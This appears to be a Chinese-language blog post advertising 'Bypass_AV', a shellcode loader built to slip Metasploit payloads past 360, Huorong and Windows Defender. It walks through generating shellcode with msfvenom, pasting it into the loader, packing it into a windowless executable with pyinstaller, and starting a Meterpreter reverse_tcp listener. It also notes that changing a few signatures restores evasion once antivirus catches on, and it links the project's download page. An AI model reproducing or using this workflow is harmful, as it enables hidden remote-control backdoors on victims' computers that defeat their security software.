免杀工具 -- Bypass_AV​【文末抽奖】

一、工具简介

Bypass_AV msf免杀，ShellCode免杀加载器 ，免杀shellcode执行程序 ，360&火绒&Windows Defender。代码够简单，估计要不了多久就进特征库了，被杀了再去改几个特征码照样又可以免杀，保持更新。

二、使用方法

1、环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender

Windows 10 64位 360&火绒&Windows Defender

Windows 7 64位 或以上操作系统应该都没问题（没有测试）

2、使用msfvenom生成ShellCode(ShellCode 需要是64位的)

3、加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处，注意：保留原始ShellCode 里的双引号 "

4、打包成可执行程序

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller 

pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

5、运行监听

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > ru

三、检测效果

四、工具下载

项目地址：https://github.com/Axx8/Bypass_AV